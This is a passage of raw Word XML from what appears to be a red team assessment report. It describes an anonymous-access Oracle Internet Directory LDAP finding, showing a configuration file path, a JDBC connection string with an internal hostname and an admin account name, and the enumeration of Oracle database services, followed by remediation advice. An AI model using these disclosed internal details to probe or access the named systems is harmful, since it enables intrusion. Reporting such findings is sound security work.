          <w:p w14:paraId="780B6302" w14:textId="269481B1" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="0092561E">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Unsecured Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67BF9937" w14:textId="27C42BD5" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="004F5BAD" w:rsidP="0033159C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD0CC5" w14:textId="1A4615BB" w:rsidR="000F2F00" w:rsidRPr="001019D3" w:rsidRDefault="000F2F00" w:rsidP="0033159C">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and performing local reconnaissance on the hosts (</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824973 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="00FB2591" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the Red Team </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t>discovered</w:t>
      </w:r>
      <w:r w:rsidR="00FB2591" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> the Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidR="00FB2591" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">service whose connection information was found in a </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>configuration file</w:t>
      </w:r>
      <w:r w:rsidR="00FB2591" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7714D4" w14:textId="22C12B35" w:rsidR="004F5BAD" w:rsidRPr="001019D3" w:rsidRDefault="000F2F00" w:rsidP="0033159C">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The service is </w:t>
      </w:r>
      <w:r w:rsidR="004F5BAD" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">accessible </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">from anywhere on the internal network </w:t>
      </w:r>
      <w:r w:rsidR="004F5BAD" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">and allowed </w:t>
      </w:r>
      <w:r w:rsidR="0033159C" w:rsidRPr="001019D3">
        <w:t>anonymous access (without username and password)</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to perform </w:t>
      </w:r>
      <w:r w:rsidR="004F5BAD" w:rsidRPr="001019D3">
        <w:t>queries</w:t>
      </w:r>
      <w:r w:rsidR="0033159C" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and return results</w:t>
      </w:r>
      <w:r w:rsidR="00FB2591" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> containing information about deployed Oracle systems</w:t>
      </w:r>
      <w:r w:rsidR="004F5BAD" w:rsidRPr="001019D3">
        <w:t>. By leveraging this misconfiguration, the Red Team was able to enumerate all Oracle D</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="004F5BAD" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> service objects, connection strings, and network topology information</w:t>
      </w:r>
      <w:r w:rsidR="0033159C" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> without the need of having any credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D1B6F" w14:textId="1C39EBE3" w:rsidR="000F2F00" w:rsidRPr="001019D3" w:rsidRDefault="000F2F00" w:rsidP="0033159C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C7CE7C" w14:textId="60F1C701" w:rsidR="004F5BAD" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0033159C">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> one of the We</w:t>
      </w:r>
      <w:r w:rsidR="0033159C" w:rsidRPr="001019D3">
        <w:t>bLogic</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">servers, one </w:t>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">of the </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>configuration files contained an Oracle JDBC connection string referenc</w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t>the OID</w:t>
      </w:r>
      <w:r w:rsidR="0033159C" w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B71B0E" w:rsidRPr="001019D3" w14:paraId="18AAF88C" w14:textId="77777777" w:rsidTr="00CF7AC3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9518" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3F50C539" w14:textId="05B05BE5" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="00CF7AC3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/ec/local/weblogic/u010/home/wlsopert/config/CHTICHLVA002_TST/config/jdbc/test-cop-datasource-jdbc.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3386ED7B" w14:textId="242734E5" w:rsidR="004F5BAD" w:rsidRPr="001019D3" w:rsidRDefault="00CF7AC3" w:rsidP="00CF7AC3">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The file contained the following</w:t>
      </w:r>
      <w:r w:rsidR="00B71B0E" w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B71B0E" w:rsidRPr="001019D3" w14:paraId="6C531FC0" w14:textId="77777777" w:rsidTr="00415D22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8746" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4D27A2BB" w14:textId="24FF8CE8" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="00CF7AC3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;truncated for brevity&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4068207F" w14:textId="7690174C" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="00CF7AC3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3055F1B3" w14:textId="049AC444" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="00CF7AC3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "jdbc:oracle:thin:@ldap://</w:t>
            </w:r>
            <w:hyperlink r:id="rId42" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="001019D3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>oid.cc.cec.eu.int:389</w:t>
              </w:r>
              <w:r w:rsidRPr="001019D3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                  <w:color w:val="auto"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>/CLIMA_EUCR_COP_01_T,cn=OracleContext,dc=prod,dc=cop,dc=cec,dc=eu,dc=int</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C262F60" w14:textId="77777777" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="00CF7AC3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>user = "CLIMA_EUCR_01_ADMIN"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF4746F" w14:textId="77777777" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="00CF7AC3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>encrypted_password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "{AES256}XXXXXXXXXXXXXXXXXX"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34774F9A" w14:textId="4E1A398E" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="00CF7AC3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E09F7B" w14:textId="28ED0407" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="00CF7AC3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;truncated for brevity&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32A09083" w14:textId="102FA570" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00426AE4" w:rsidP="00415D22">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The encrypted </w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">password was decrypted </w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">in the same way as done during the local reconnaissance phase (see </w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824973 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.3</w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">eventually </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ing access </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t>Oracle DB instance</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A98E36" w14:textId="7DB4316F" w:rsidR="00426AE4" w:rsidRPr="001019D3" w:rsidRDefault="00426AE4" w:rsidP="00415D22">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The Red Team </w:t>
      </w:r>
      <w:r w:rsidR="00CF7AC3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">however focused on extracting information from the available OID server and </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">developed a script </w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>parse_oracle_ldap.sh</w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">that allowed to incorporate various utilities </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>ldapsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">to assist in the </w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">extraction </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">as much </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">information </w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">as possible about </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>Oracle D</w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t>B servers used by ETS</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F43F107" w14:textId="77777777" w:rsidR="00F8258A" w:rsidRPr="001019D3" w:rsidRDefault="00F8258A" w:rsidP="00415D22">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="663571D9" wp14:editId="1BD31B87">
            <wp:extent cx="5532712" cy="3663950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2087842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2707" name="Picture 2087842707"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5534750" cy="3665300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06817064" w14:textId="34FC1520" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00F8258A" w:rsidP="00415D22">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc213253806"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: Anonymous </w:t>
      </w:r>
      <w:r w:rsidR="006016FE" w:rsidRPr="001019D3">
        <w:t>OID</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidR="006016FE" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w14:paraId="525704EA" w14:textId="153D73DA" w:rsidR="00F8258A" w:rsidRPr="001019D3" w:rsidRDefault="00F8258A" w:rsidP="006F5C7A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 05/06/2025 5:37 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A21158B" w14:textId="1D47DBCC" w:rsidR="00E716E5" w:rsidRPr="001019D3" w:rsidRDefault="00E716E5" w:rsidP="00F62DB6">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t>OID</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">access </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">configuration </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> weak and </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">seems to </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">expose </w:t>
      </w:r>
      <w:r w:rsidR="00415D22" w:rsidRPr="001019D3">
        <w:t>all hosted systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1ADA6" w14:textId="7047CB54" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00412AA9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The list of servers that reference the Oracle Internet Directory (OID) server can be found in annex </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213086292 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.8</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F61BC" w14:textId="0E7C4378" w:rsidR="004F5BAD" w:rsidRPr="001019D3" w:rsidRDefault="004F5BAD" w:rsidP="006F5C7A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r w:rsidR="006F5C7A" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169119AD" w14:textId="2F01F6ED" w:rsidR="006F5C7A" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Configure the Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>to require authentication for all search and query operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268845A" w14:textId="2FD75EA0" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
